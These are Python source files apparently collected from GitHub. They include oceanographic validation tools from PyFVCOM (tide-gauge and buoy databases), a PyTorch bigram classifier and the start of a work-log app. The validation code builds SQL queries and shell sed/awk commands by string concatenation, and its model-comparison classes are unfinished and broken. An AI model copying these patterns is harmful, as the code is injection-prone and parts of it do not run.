table_name = "gauge_obs as go"
inner_join_str = "sites as st on st.site_id = go.site_id"
if isinstance(station_identifier, str):
where_str = "st.site_tla = '" + station_identifier + "'"
else:
where_str = "st.site_id = " + str(int(station_identifier))
if start_date_dt is not None:
start_sec = dt_to_epochsec(start_date_dt)
where_str += " and go.time_int >= " + str(start_sec)
if end_date_dt is not None:
end_sec = dt_to_epochsec(end_date_dt)
where_str += " and go.time_int <= " + str(end_sec)
order_by_str = 'go.time_int'
return_data = self.select_qry(table_name, where_str, select_str, order_by_str, inner_join_str)
if not return_data:
print('No data available')
dates, data = None, None
else:
return_data = np.asarray(return_data)
date_list = [epochsec_to_dt(this_time) for this_time in return_data[:,0]]
dates, data = np.asarray(date_list), return_data[:, 1:]
return dates, data
def get_gauge_locations(self, long_names=False):
"""
Extract locations and names of the tide gauges from the database.
Parameters
----------
long_names : bool, optional
If True, return the 'nice' long names rather than the station identifiers.
Returns
-------
tla_name : np.ndarray
List of tide gauge names.
lon_lat : np.ndarray
Positions of the gauges.
"""
gauge_site_data = np.asarray(self.select_qry('sites', None))
if long_names:
tla_name = gauge_site_data[:, 2]
else:
tla_name = gauge_site_data[:, 1]
lon_lat = np.asarray(gauge_site_data[:, 3:5], dtype=float)
return tla_name, lon_lat
def get_nearest_gauge_id(self, lon, lat, threshold=np.inf):
"""
Get the ID of the gauge closest to the position given by `lon' and `lat'.
lon, lat : float
Position for which to search for the nearest tide gauge.
Returns
-------
closest_gauge_id : int
Database ID for the gauge closest to `lon' and `lat'.
min_dist : float
Distance in metres between `lon' and `lat' and the gauge.
threshold : float
Threshold distance in metres (inclusive) within which gauges must be from the given position. If no
gauges are found within this distance, the gauge ID is None.
"""
sites_lat_lon = np.asarray(self.select_qry('sites', None, 'site_id, lat, lon'))
min_dist = np.inf
closest_gauge_id = None # we should make this False or None or something
for this_row in sites_lat_lon:
this_dist = vincenty_distance([lat, lon], [this_row[1], this_row[2]])
if this_dist < min_dist:
min_dist = this_dist
closest_gauge_id = this_row[0]
if min_dist >= threshold:
closest_gauge_id = None
else:
closest_gauge_id = int(closest_gauge_id)
return closest_gauge_id, min_dist
def _add_sql_strings(self):
""" Function to define the database structure. """
bodc_tables = {'gauge_obs': ['site_id integer NOT NULL', 'time_int integer NOT NULL',
'elevation real NOT NULL', 'elevation_flag integer', 'residual real', 'residual_flag integer',
'PRIMARY KEY (site_id, time_int)', 'FOREIGN KEY (site_id) REFERENCES sites(site_id)',
'FOREIGN KEY (elevation_flag) REFERENCES error_flags(flag_id)',
'FOREIGN KEY (residual_flag) REFERENCES error_flags(flag_id)'],
'sites': ['site_id integer NOT NULL', 'site_tla text NOT NULL', 'site_name text', 'lon real', 'lat real',
'other_stuff text', 'PRIMARY KEY (site_id)'],
'error_flags': ['flag_id integer NOT NULL', 'flag_code text', 'flag_description text']}
for this_key, this_val in bodc_tables.items():
self.make_create_table_sql(this_key, this_val)
class bodc_annual_tide_file():
def __init__(self, file_name, header_length=11):
"""
Assumptions: file name of the form yearTLA.txt
"""
bodc_annual_tide_file._clean_tide_file(file_name, header_length)
with open(file_name) as f:
header_lines = [next(f) for this_line in range(header_length)]
for this_line in header_lines:
if 'ongitude' in this_line:
self.lon = [float(s) for s in this_line.split() if bodc_annual_tide_file._is_number(s)][0]
if 'atitude' in this_line:
self.lat = [float(s) for s in this_line.split() if bodc_annual_tide_file._is_number(s)][0]
if 'Site' in this_line:
site_str_raw = this_line.split()[1:]
if len(site_str_raw) == 1:
site_str = site_str_raw[0]
else:
site_str = ''
for this_str in site_str_raw:
site_str += this_str
self.site_name = site_str
self.site_tla = file_name.split('/')[-1][4:7]
raw_data = np.loadtxt(file_name, skiprows=header_length, dtype=bytes).astype(str)
seconds_from_ref = []
for this_row in raw_data:
this_dt_str = this_row[1] + ' ' + this_row[2]
this_seconds_from_ref = dt_to_epochsec(dt.datetime.strptime(this_dt_str, '%Y/%m/%d %H:%M:%S'))
seconds_from_ref.append(int(this_seconds_from_ref))
self.seconds_from_ref = seconds_from_ref
elevation_data = []
elevation_flag = []
residual_data = []
residual_flag = []
for this_row in raw_data:
meas, error_code = bodc_annual_tide_file._parse_tide_obs(this_row[3])
elevation_data.append(meas)
elevation_flag.append(error_code)
meas, error_code = bodc_annual_tide_file._parse_tide_obs(this_row[4])
residual_data.append(meas)
residual_flag.append(error_code)
self.elevation_data = elevation_data
self.elevation_flag = elevation_flag
self.residual_data = residual_data
self.residual_flag = residual_flag
@staticmethod
def _parse_tide_obs(in_str):
error_code_dict = {'M':1, 'N':2, 'T':3}
try:
int(in_str[-1])
error_code = 0
meas = float(in_str)
except:
error_code_str = in_str[-1]
meas = float(in_str[0:-1])
try:
error_code = error_code_dict[error_code_str]
except:
print('Unrecognised error code')
return
return meas, error_code
@staticmethod
def _is_number(s):
try:
float(s)
return True
except ValueError:
return False
@staticmethod
def _clean_tide_file(file_name, header_length):
sed_str = "sed -i '"+ str(header_length + 1) + ",$ {/^ *[0-9]/!d}' " + file_name
sp.call([sed_str], shell=True)
#################################################################################################################
"""
Validation against L4 and E1 CTD and buoy data
observations_meta_data = {'buoy_name':'E1', 'year':'2006', 'ctd_new_file_type': False,
'ctd_datadir':'/data/euryale4/backup/mbe/Data/WCO_data/E1/CTD_data/2006',
'buoy_filepath':None, 'lon':-4.368, 'lat':50.035}
observations_meta_data = {'buoy_name':'L4', 'year':'2015', 'ctd_new_file_type': True, 'ctd_filepath':'./data/e1_data_2015.txt',
'buoy_filepath': , '/data/euryale4/backup/mbe/Data/WCO_data/L4/Buoy_data/l4_cont_data_2015.txt', 'lon':-4.217, 'lat':50.250}
model_filestr_lambda = lambda m: '/data/euryale4/backup/mbe/Models/FVCOM/tamar_v2/run/output/depth_tweak2/2006/{:02d}/tamar_v2_0001.nc'.format(m)
available_months = np.arange(1,13)
model_file_list = [model_filestr_lambda(this_month) for this_month in available_months]
"""
class db_wco(validation_db):
""" Work with an SQL database of data from PML's Western Channel Observatory. """
def make_wco_tables(self):
"""
Make the complete set of empty tables for data to be inserted into (as defined in _add_sql_strings).
"""
# Insert information into the error flags table
self._add_sql_strings()
for this_table, this_str in self.create_table_sql.items():
self.execute_sql(this_str)
sites_data = [(0, 'L4',-4.217,50.250, ' '), (1, 'E1',-4.368,50.035,' ')]
self.insert_into_table('sites', sites_data)
measurement_type_data = [(0,'CTD measurements'), (1, 'Surface buoy measurements')]
self.insert_into_table('measurement_types', measurement_type_data)
self.execute_sql('create index date_index on obs (time_int);')
def _add_sql_strings(self):
wco_tables = {'obs':['buoy_id integer NOT NULL', 'time_int integer NOT NULL',
'depth real NOT NULL', 'temp real', 'salinity real', 'measurement_flag integer NOT NULL',
'PRIMARY KEY (buoy_id, depth, measurement_flag, time_int)', 'FOREIGN KEY (buoy_id) REFERENCES sites(buoy_id)',
'FOREIGN KEY (measurement_flag) REFERENCES measurement_types(measurement_flag)'],
'sites':['buoy_id integer NOT NULL', 'buoy_name text', 'lon real', 'lat real',
'other_stuff text', 'PRIMARY KEY (buoy_id)'],
'measurement_types':['measurement_flag integer NOT NULL', 'measurement_description text', 'PRIMARY KEY (measurement_flag)']}
for this_key, this_val in wco_tables.items():
self.make_create_table_sql(this_key, this_val)
def insert_CTD_file(self, filestr, buoy_id):
file_obj = WCO_obs_file(filestr)
self._insert_obs(file_obj, buoy_id, 0.0)
def insert_buoy_file(self, filestr, buoy_id):
file_obj = WCO_obs_file(filestr, depth=0)
self._insert_obs(file_obj, buoy_id, 1.0)
def insert_CTD_dir(self, dirstr, buoy_id):
file_obj = CTD_dir(dirstr)
self._insert_obs(file_obj, buoy_id, 0.0)
def _insert_obs(self, file_obj, buoy_id, measurement_id):
epoch_sec_timelist = []
for this_time in file_obj.observation_dict['dt_time']:
epoch_sec_timelist.append(dt_to_epochsec(this_time))
buoy_id_list = np.tile(buoy_id, len(epoch_sec_timelist))
measurement_id_list = np.tile(measurement_id, len(epoch_sec_timelist))
table_data = list(zip(buoy_id_list, epoch_sec_timelist, file_obj.observation_dict['depth'], file_obj.observation_dict['temp'],
file_obj.observation_dict['salinity'], measurement_id_list))
self.insert_into_table('obs', table_data)
def get_observations(self, buoy_name, start_date_dt=None, end_date_dt=None, measurement_id=None):
select_str = "time_int, depth, temp, salinity"
table_name = "obs as go"
inner_join_str = "sites as st on st.buoy_id = go.buoy_id"
where_str = "st.buoy_name = '" + buoy_name + "'"
if start_date_dt is not None:
start_sec = dt_to_epochsec(start_date_dt)
where_str += " and go.time_int >= " + str(start_sec)
if end_date_dt is not None:
end_sec = dt_to_epochsec(end_date_dt)
where_str += " and go.time_int <= " + str(end_sec)
order_by_str = 'go.time_int, go.depth'
return_data = self.select_qry(table_name, where_str, select_str, order_by_str, inner_join_str)
if not return_data:
dates, data = None, None
print('No data available')
else:
return_data = np.asarray(return_data)
date_list = [epochsec_to_dt(this_time) for this_time in return_data[:,0]]
dates, data = np.asarray(date_list), return_data[:,1:]
return dates, data
class WCO_obs_file():
def __init__(self, filename, depth=None):
self._setup_possible_vars()
self.observation_dict = self._add_file(filename)
if depth is not None:
self.observation_dict['depth'] = np.tile(depth, len(self.observation_dict['dt_time']))
def _add_file(self,filename,remove_undated=True):
# remove duff lines
sed_str = "sed '/^-9.990e/d' " + filename + " > temp_file.txt"
sp.call(sed_str, shell=True)
# some files have multiple records of differing types...helpful
temp_str = 'YKA123ASD'
file_split_str = '''awk '/^[^0-9]/{g++} { print $0 > "''' + temp_str + '''"g".txt"}' temp_file.txt'''
sp.call(file_split_str, shell=True)
temp_file_list = gb.glob(temp_str + '*')
obs_dict_list = []
for this_file in temp_file_list:
this_obs = self._add_file_part(this_file)
if not remove_undated or 'dt_time' in this_obs:
obs_dict_list.append(this_obs)
rm_file = [os.remove(this_file) for this_file in temp_file_list]
return {this_key:np.hstack([this_dict[this_key] for this_dict in obs_dict_list]) for this_key in obs_dict_list[0]}
def _add_file_part(self, filename):
# seperate header and clean out non numeric lines
head_str ="head -1 " + filename + " > temp_header_file.txt"
sed_str = "sed '/^[!0-9]/!d' " + filename + " > temp_file.txt"
sp.call(head_str, shell=True)
sp.call(sed_str, shell=True)
# Load the files, some use semi-colon delimiters, some whitespace...
if ';' in str(np.loadtxt('temp_header_file.txt', delimiter='no_delimination_needed', dtype=str)):
observations_raw = np.loadtxt('temp_file.txt', delimiter=';',dtype=str)
observations_header = np.loadtxt('temp_header_file.txt', delimiter=';',dtype=str)
elif ',' in str(np.loadtxt('temp_header_file.txt', delimiter='no_delimination_needed', dtype=str)):
observations_raw = np.loadtxt('temp_file.txt', delimiter=',',dtype=str)
observations_header = np.loadtxt('temp_header_file.txt', delimiter=',',dtype=str)
else:
observations_raw = np.loadtxt('temp_file.txt', dtype=str)
observations_header = np.loadtxt('temp_header_file.txt', dtype=str)
# Clean up temp files
os.remove('temp_file.txt')
os.remove('temp_header_file.txt')
# Find the relevant columns and pull out temp, salinity, date, etc if available
observation_dict = {}
time_vars = []
for this_var, this_possible in self.possible_vars.items():
if np.any(np.isin(this_possible, observations_header)):
this_col = np.where(np.isin(observations_header, this_possible))[0]
if this_var == 'time' or this_var =='date' or this_var=='Jd':
observation_dict[this_var] = np.squeeze(np.asarray(observations_raw[:,this_col], dtype=str))
time_vars.append(this_possible[np.isin(this_possible, observations_header)])
else:
observation_dict[this_var] = np.squeeze(np.asarray(observations_raw[:,this_col], dtype=float))
if 'date' in observation_dict:
observation_dict['dt_time'] = self._parse_dates_to_dt(observation_dict, time_vars)
return observation_dict
def _setup_possible_vars(self):
self.possible_vars = {'temp':np.asarray(['Tv290C', 'SST', ' Mean SST (degC)']), 'salinity':np.asarray(['Sal00', 'Sal', ' Mean SST (degC)']),
'depth':np.asarray(['DepSM']), 'date':np.asarray(['mm/dd/yyyy', 'Year', ' Date (YYMMDD)']),
'julian_day':np.asarray(['Jd']), 'time':np.asarray(['hh:mm:ss', 'Time', ' Time (HHMMSS)'])}
@staticmethod
def _parse_dates_to_dt(obs_dict, time_vars):
dt_list = []
if np.any(np.isin('mm/dd/yyyy', time_vars)):
for this_time, this_date in zip(obs_dict['time'], obs_dict['date']):
dt_list.append(dt.datetime.strptime(this_date + ' ' + this_time, '%m/%d/%Y %H:%M:%S'))
elif np.any(np.isin('Year', time_vars)):
for this_time, (this_jd, this_year) in zip(obs_dict['time'], zip(obs_dict['julian_day'], obs_dict['date'])):
dt_list.append(dt.datetime(int(this_year),1,1) + dt.timedelta(days=int(this_jd) -1) +
dt.timedelta(hours=int(this_time.split('.')[0])) + dt.timedelta(minutes=int(this_time.split('.')[1])))
elif np.any(np.isin(' Date (YYMMDD)', time_vars)):
for this_time, this_date in zip(obs_dict['time'], obs_dict['date']):
dt_list.append(dt.datetime.strptime(this_date + ' ' + this_time, '%y%m%d %H%M%S'))
else:
print('Date parser not up to date with possible vars')
dt_list = None
return np.asarray(dt_list)
class CTD_dir(WCO_obs_file):
def __init__(self, dirname):
all_files = os.listdir(dirname)
dt_list = []
observation_dict_list = []
self._setup_possible_vars()
for this_file in all_files:
print('Processing file {}'.format(this_file))
try:
observation_dict_list.append(self._add_file(dirname + this_file, remove_undated=False))
date_str = '20' + this_file[0:2] + '-' + this_file[2:4] + '-' + this_file[4:6]
this_dt = dt.datetime.strptime(date_str, '%Y-%m-%d') + dt.timedelta(hours=12)
dt_list.append(np.tile(this_dt, len(observation_dict_list[-1]['temp'])))
except ValueError:
print('Error in file {}'.format(this_file))
# Flatten the list of dictionaries to one dictionary
self.observation_dict = {this_key:np.hstack([this_dict[this_key] for this_dict in observation_dict_list]) for this_key in observation_dict_list[0]}
self.observation_dict['dt_time'] = np.hstack(dt_list)
"""
Do the comparison
"""
class comp_data():
def __init__(self, buoy_list, file_list_or_probe_dir, wco_database, max_time_threshold=dt.timedelta(hours=1), max_depth_threshold = 100, probe_depths=None):
self.file_list_or_probe_dir
self.database_obj = wco_database
self.buoy_list = buoy_list
self.model_data = {}
if probe_depths is not None:
for this_ind, this_buoy in enumerate(buoy_list):
self.model_data[this_buoy]['depth'] = probe_depths[this_ind]
self.observations = {}
for this_buoy in self.buoy_list:
self.observations[this_buoy] = {}
def retrieve_file_data(self):
pass
def retrieve_obs_data(self, buoy_name, var, measurement_type=None):
if not hasattr(self.model_date_mm):
print('Retrieve model data first')
return
obs_dt, obs_raw = self.database_obj.get_obs_data(buoy_name, var, self.model_date_mm[0], self.model_date_mm[1], measurement_type)
obs_depth = obs_raw[:,0]
obs_var = obs_raw[:,1]
self.observations[buoy_name][var] = obs_dict
def get_comp_data_interpolated(self, buoy_name, var_list):
if not hasattr(self, comp_dict):
self.comp_dict = {}
obs_dates = np.unique([this_date.date() for this_date in observations['time']])
obs_comp = {}
for this_ind, this_obs_time in enumerate(obs_dates):
if this_obs_date >= model_time_mm[0].date() and this_obs_date <= model_time_mm[1].date():
this_obs_choose = [this_time.date() == this_obs_date for this_time in self.observations[buoy_name]['dt_time']]
t
this_time_before, this_time_after = self.model_closest_both_times(this_obs_time)
this_obs_deps = self.observations[buoy_name]['depth'][this_obs_choose]
for var in var_list:
this_obs = self.observations[buoy_name][var][this_obs_choose]
this_model = np.squeeze(fvcom_data_reader.data.temp[this_time_close,...])
this_model_interp = np.squeeze(np.interp(this_obs_deps, model_depths, this_model))
try:
obs_comp[var].append(this_comp)
except KeyError:
obs_comp[var] = this_comp
max_obs_depth.append(np.max(this_obs_deps))
self.comp_dict[buoy_name] = obs_comp
def comp_data_nearest(self, buoy_name, var_list):
pass
def model_closest_time():
pass
class comp_data_filereader(comp_data):
def retrieve_file_data(self):
where_str = 'buoy_name in ('
for this_buoy in self.buoy_list:
where_str+=this_buoy + ','
where_str = where_str[0:-1] + ')'
buoy_lat_lons = self.wco_database.select_query('sites', where_str, 'buoy_name, lon, lat')
first_file = True
model_all_dicts = {}
for this_file in self.file_list:
if first_file:
fvcom_data_reader = FileReader(this_file, ['temp', 'salinity'])
close_node = []
for this_buoy_ll in buoy_lat_lons:
close_node.append()
model_depths = fvcom_data_reader.grid.siglay * fvcom_data_reader.grid.h * -1
for this_buoy in self.buoy_list:
model_all_dicts[this_buoy] = {'dt_time': mod_times, 'temp': mod_t_vals, 'salinity': mod_s_vals}
first_file = False
else:
fvcom_data_reader = FileReader(this_file, ['temp', 'salinity'], dims={'node':[close_node]})
for this_buoy in self.buoy_list:
model_all_dicts
model_depths = fvcom_data_reader.grid.siglay * fvcom_data_reader.grid.h * -1
for this_buoy in self.buoy_list:
model_all_dicts[this_buoy]['depth'] = model_dp
for this_buoy in self.buoy_list:
self.model_data[this_buoy] = model_all_dicts[this_buoy]
def model_closest_time(self, find_time):
return closest_time
class comp_data_probe(comp_data):
def retrieve_file_data():
for this_buoy in self.buoy_list:
t_filelist = []
s_filelist = []
for this_dir in self.file_or_probe_dir_list:
t_filelist.append(this_dir + this_buoy + '_t1.dat')
s_filelist.append(this_dir + this_buoy + '_s1.dat')
mod_times, mod_t_vals, mod_pos = pf.read.read_probes(t_filelist, locations=True, datetimes=True)
mod_times, mod_s_vals, mod_pos = pf.read.read_probes(s_filelist, locations=True, datetimes=True)
model_dict = {'dt_time':mod_times, 'temp':mod_t_vals, 'salinity':mod_s_vals}
self.model_data[this_buoy] = model_dict
def wco_model_comparison(model_file_list, obs_database_file):
temp_comp = []
sal_comp = []
dates_comp = []
max_obs_depth = []
obs_dates = np.unique([this_date.date() for this_date in observations['time']])
for this_ind, this_obs_date in enumerate(obs_dates):
if this_obs_date >= model_time_mm[0].date() and this_obs_date <= model_time_mm[1].date():
this_obs_choose = [this_time.date() == this_obs_date for this_time in observations['time']]
this_obs_time = np.min(observations['time'][this_obs_choose])
this_time_close = fvcom_data_reader.closest_time(this_obs_time)
this_obs_deps = observations['h'][this_obs_choose]
this_obs_temp = observations['temp'][this_obs_choose]
this_obs_salinity = observations['salinity'][this_obs_choose]
this_obs_temp_interp = np.squeeze(np.interp(model_depths, this_obs_deps, this_obs_temp))
this_obs_salinity_interp = np.squeeze(np.interp(model_depths, this_obs_deps, this_obs_salinity))
this_model_temp = np.squeeze(fvcom_data_reader.data.temp[this_time_close,...])
this_model_salinity = np.squeeze(fvcom_data_reader.data.salinity[this_time_close,...])
temp_comp.append(np.asarray([this_obs_temp_interp, this_model_temp]))
sal_comp.append(np.asarray([this_obs_salinity_interp, this_model_salinity]))
dates_comp.append(this_obs_time)
max_obs_depth.append(np.max(this_obs_deps))
ctd_comp = {'temp':temp_comp, 'salinity':sal_comp, 'dates':dates_comp, 'max_depth':max_obs_depth}
observations = get_buoy_obs(obs_meta_data)
if observations:
buoy_temp_comp = []
buoy_sal_comp = []
buoy_dates_comp = []
for this_ind, this_obs_time in enumerate(observations['time']):
if this_obs_time >= model_time_mm[0] and this_obs_time <= model_time_mm[1]:
this_time_close = fvcom_data_reader.closest_time(this_obs_time)
buoy_temp_comp.append([observations['temp'][this_ind], fvcom_data_reader.data.temp[this_time_close,0]])
buoy_sal_comp.append([observations['salinity'][this_ind], fvcom_data_reader.data.salinity[this_time_close,0]])
buoy_dates_comp.append([this_obs_time, this_time_close])
buoy_comp = {'temp':buoy_temp_comp, 'salinity':buoy_sal_comp, 'dates':buoy_dates_comp}
else:
buoy_comp = {}
return ctd_comp, buoy_comp
| li12242/PyFVCOM | PyFVCOM/validation.py | validation.py | py | 40,160 | python | en | code | null | github-code | 1 | [
{
"api_name": "datetime.datetime",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sqlite3.connect",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 176,
"usage_type": "call"
},
{
"api_name": "numpy.inf",
... |
25056244488 | import argparse
import time
import re
import os
import datetime
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim.lr_scheduler import ReduceLROnPlateau
from torch.utils.data import Dataset, DataLoader, random_split
from torch.nn.utils.rnn import pack_padded_sequence, pad_sequence
from vocab import Vocab
class Merger(nn.Module):
def __init__(self, args, vocab):
super().__init__()
self.bigram_encoder = Merger.BigramCharRNN(
args,
output_vocab_size=2,
input_vocab=vocab.src.char2id)
def forward(self, bigrams, lengths_bigram):
outputs_bigram = self.bigram_encoder(bigrams, lengths_bigram)
return outputs_bigram
class BigramCharRNN(nn.Module):
def __init__(self,
args,
output_vocab_size,
input_vocab):
super().__init__()
self.input_vocab = input_vocab
self.hidden_dim = args.rnn_dim_char
self.num_layers = args.rnn_layers
self.word_embeddings = nn.Embedding(len(input_vocab), args.ce_dim)
self.lstm = nn.LSTM(args.ce_dim,
args.rnn_dim_char,
num_layers=args.rnn_layers,
bidirectional=True)
self.fc0 = nn.Linear(args.rnn_dim_char, 64)
self.fc1 = nn.Linear(64, output_vocab_size)
self.relu = nn.ReLU()
self.dropout = nn.Dropout(0.1)
def forward(self, bigrams, lengths):
embeds = self.dropout(self.word_embeddings(bigrams))
packed_embeds = pack_padded_sequence(
embeds, lengths, enforce_sorted=False)
_, hidden = self.lstm(packed_embeds)
hidden = sum(hidden[i][j, :, :]
for i in range(2) for j in range(self.num_layers))
tag_space = self.relu(self.fc0(hidden))
tag_space = self.fc1(tag_space)
return tag_space
class Network:
def __init__(self, args) -> None:
self.device = torch.device(
f'cuda:{args.gpu_index}' if torch.cuda.is_available() else 'cpu')
self.vocab = Vocab.load(args.vocab_path)
self.load_data(args)
self.model = Merger(args, vocab=self.vocab).to(self.device)
self.loss_function = nn.CrossEntropyLoss()
self.optimizer = optim.Adam(self.model.parameters())
self.scheduler = ReduceLROnPlateau(self.optimizer, 'min', patience=3)
class BigramData(Dataset):
def __init__(self, data) -> None:
self.data = data
def __getitem__(self, index):
src = torch.tensor(self.data[index][0], dtype=torch.long)
label = torch.tensor(self.data[index][1], dtype=torch.long)
return src, label
def __len__(self):
return len(self.data)
def load_data(self, args, train_split=0.8):
with open(args.data) as f:
data = [line.split('\t') for line in f.readlines()]
src = self.vocab.src.words2indices([list(line[0].strip()) for line in data])
labels = [0 if bigram[1].strip() == '0' else 1 for bigram in data]
src, labels = src[:args.data_size], labels[:args.data_size]
data = list(zip(src, labels))
lengths = [int(len(src)*train_split), int(len(src)*(1-train_split))]
if sum(lengths) != len(src):
lengths[0] += len(src) - sum(lengths)
train_data, dev_data = random_split(data, lengths)
train_data = Network.BigramData(train_data)
dev_data = Network.BigramData(dev_data)
def generate_batch(data_batch):
src_batch, labels_batch = [], []
lengths_bigram = []
for src_item, label_item in data_batch:
lengths_bigram.append(len(src_item))
src_batch.append(src_item)
labels_batch.append(label_item)
src_batch = pad_sequence(
src_batch, padding_value=self.vocab.src.word2id['<pad>'])
labels_batch = torch.stack(labels_batch)
return (src_batch, labels_batch), lengths_bigram
self.train_iter = DataLoader(train_data, batch_size=args.batch_size,
shuffle=True, collate_fn=generate_batch)
self.dev_iter = DataLoader(train_data, batch_size=args.batch_size,
collate_fn=generate_batch)
@staticmethod
def epoch_time(start_time: int,
end_time: int):
elapsed_time = end_time - start_time
elapsed_mins = int(elapsed_time / 60)
elapsed_secs = int(elapsed_time - (elapsed_mins * 60))
return elapsed_mins, elapsed_secs
def train(self, args):
metrics = {'train_loss': [], 'dev_loss': [], 'dev_acc': []}
for epoch in range(args.epochs):
self.model.train()
print(f'Epoch {epoch+1}/{args.epochs}')
epoch_loss = 0
start_time = time.time()
for iteration, train_batch in enumerate(self.train_iter):
(bigrams, labels), lengths = train_batch
self.model.zero_grad()
bigrams, labels = bigrams.to(self.device), labels.to(self.device)
tag_scores = self.model(bigrams, lengths)
tag_scores = tag_scores.view(-1, tag_scores.shape[-1])
labels = labels.view(-1)
loss = self.loss_function(tag_scores, labels)
loss.backward()
self.optimizer.step()
epoch_loss += loss.item()
if iteration and iteration % 100 == 0 and len(self.train_iter) - iteration > 10 \
or iteration + 1 == len(self.train_iter):
for param_group in self.optimizer.param_groups:
lr = param_group['lr']
print(
f'Batch {iteration}/{len(self.train_iter)-1}\t| Loss {loss.item():.7f} | lr {lr}')
metrics['train_loss'].append(epoch_loss / iteration)
end_time = time.time()
epoch_mins, epoch_secs = Network.epoch_time(start_time, end_time)
val_metrics = self.evaluate()
for m in metrics:
if m != 'train_loss':
metrics[m].append(val_metrics[m])
print(
f'Epoch {epoch+1}/{args.epochs} | Time: {epoch_mins}m {epoch_secs}s')
print(
f"\tTrain Loss: {metrics['train_loss'][-1]:.7f} | Dev. Loss: {metrics['dev_loss'][-1]:.7f} | Dev. Acc.: {metrics['dev_acc'][-1]:.1%}")
print()
self.scheduler.step(metrics['dev_loss'][-1])
self.save_model(args)
return metrics
def evaluate(self):
self.model.eval()
with torch.no_grad():
correct, total = 0, 0
epoch_loss = 0
for (bigrams, labels), lengths in self.dev_iter:
# Loss
bigrams, labels = bigrams.to(self.device), labels.to(self.device)
output = self.model(bigrams, lengths)
loss = self.loss_function(output, labels)
epoch_loss += loss.item()
# Accuracy
output = output.argmax(-1)
correct += torch.sum(output == labels)
total += labels.shape[0]
metrics = {}
metrics['dev_acc'] = correct / total
metrics['dev_loss'] = epoch_loss / len(self.dev_iter)
return metrics
def predict(self):
self.model.eval()
pred, gold = [], []
inputs_bigram = []
with torch.no_grad():
for (bigrams, labels), lengths in self.dev_iter:
bigrams, labels = bigrams.to(self.device), labels.to(self.device)
output = self.model(bigrams, lengths)
output = output.argmax(-1)
pred += list(output.detach().cpu().numpy())
gold += list(labels.detach().cpu().numpy())
inputs_bigram += list(bigrams.permute(1, 0).detach().cpu().numpy())
return inputs_bigram, gold, pred
@staticmethod
def load_model(model_path: str):
params = torch.load(model_path)
args = params['args']
network = Network(args)
network.model.load_state_dict(params['state_dict'])
return network
def save_model(self, args):
save_path = os.path.join(args.cpt, args.logdir) + '.pt'
print('Saving model parameters to [%s]\n' % save_path)
params = {
'args': args,
'state_dict': self.model.state_dict()
}
torch.save(params, save_path)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--batch_size", default=1048,
type=int, help="Batch size.")
parser.add_argument("--epochs", default=50, type=int,
help="Number of epochs.")
parser.add_argument("--ce_dim", default=32, type=int,
help="Word embedding dimension.")
parser.add_argument("--we_dim", default=64, type=int,
help="Word embedding dimension.")
parser.add_argument("--rnn_dim_char", default=64,
type=int, help="RNN cell dimension.")
parser.add_argument("--rnn_dim", default=128,
type=int, help="RNN cell dimension.")
parser.add_argument("--rnn_layers", default=1,
type=int, help="Number of RNN layers.")
parser.add_argument("--data_size", default=10000, type=int,
help="Maximum number of examples to load.")
parser.add_argument("--gpu_index", default=0, type=int,
help="Index of GPU to be used.")
parser.add_argument("--vocab", dest='vocab_path',
default="/Users/chriscay/Library/Mobile Documents/com~apple~CloudDocs/NYUAD/camel_morph/sandbox_files/root_generator/data_nn_vocab.json", type=str,
help="Path to vocab JSON file.")
parser.add_argument("--data",
default="/Users/chriscay/Library/Mobile Documents/com~apple~CloudDocs/NYUAD/camel_morph/sandbox_files/root_generator/data_nn.tsv", type=str,
help="Path to file with bigrams dataset.")
parser.add_argument("--cpt", default='/Users/chriscay/Library/Mobile Documents/com~apple~CloudDocs/NYUAD/camel_morph/sandbox_files/root_generator/model_weights', type=str,
help="Directory to save the model checkpoints to.")
parser.add_argument("--logs", default='/Users/chriscay/Library/Mobile Documents/com~apple~CloudDocs/NYUAD/camel_morph/sandbox_files/root_generator/logs', type=str,
help="Directory to save the model checkpoints to.")
parser.add_argument("--load", default='', type=str,
help="Directory to save the model checkpoints to.")
parser.add_argument("--seed", default=42, type=int, help="Random seed.")
args = parser.parse_args([] if "__file__" not in globals() else None)
torch.manual_seed(args.seed)
np.random.seed(args.seed)
args.logdir = "{}-{}-{}".format(
os.path.basename(globals().get("__file__", "notebook").split('.')[0]),
datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S"),
",".join(("{}={}".format(re.sub(
"(.)[^_]*_?", r"\1", key), value) for key, value in sorted(vars(args).items()) if isinstance(value, int)))
)
if not args.load:
network = Network(args)
metrics = network.train(args)
print(metrics)
else:
network = Network.load(args.load)
inputs, gold, pred = network.predict()
with open(os.path.join(args.logs, args.logdir), 'w') as f:
for i, result in enumerate(pred):
bigram = ''.join(
list(map(lambda x: network.vocab.src.id2char[x], inputs[0][i])))
print(re.sub(r'(<pad>)+?', r'', bigram), file=f, end=' | ')
print(result, 'gold:', gold[i], file=f, end= ' | ')
if __name__ == '__main__':
main()
| CAMeL-Lab/camel_morph | camel_morph/sandbox/merger_network.py | merger_network.py | py | 12,300 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "torch.nn.Module",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "vocab.src",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.Module",
"l... |
38924106495 | #!/usr/bin/env python3
"""Work Log
Record work activities and store to a sqlite database
Created: 2018
Last Update: 2018-06-05
Author: Alex Koumparos
"""
import datetime
import re
# from csv_manager import CsvManager
from db_manager import DBManager
import wl_settings as settings
class Menu:
"""The user-facing class that handles all interaction with the user and
interfaces with the database manager.
"""
# STATUS VARIABLES
# ----------------
quit = False
# INITIALIZER
# -----------
def __init__(self, load_menu=True):
"""Instantiates the app, applies default settings and launches the
main menu.
"""
print("\nWORK LOG")
print("========")
self.OPTIONS = {
'date format': settings.DATE_FORMATS['iso 8601'],
'save format (date)': settings.DATE_FORMATS['iso 8601'],
'case sensitive search': False,
'entries per page': 10,
'allow future dates': False,
'earliest allowed date': datetime.datetime(1900, 1, 1),
}
self.current_record = 0
self.current_page_start = 0
if load_menu:
menu = self.main_menu()
while not self.quit:
menu = menu()
# MENU METHODS
# ------------
def main_menu(self):
"""This is the root menu. The user selects which activity to perform
and then the method returns the function for the activity.
"""
inputs = {
'a': {'text': 'Add new entry',
'function': self.add_entry},
's': {'text': 'Search in existing entries',
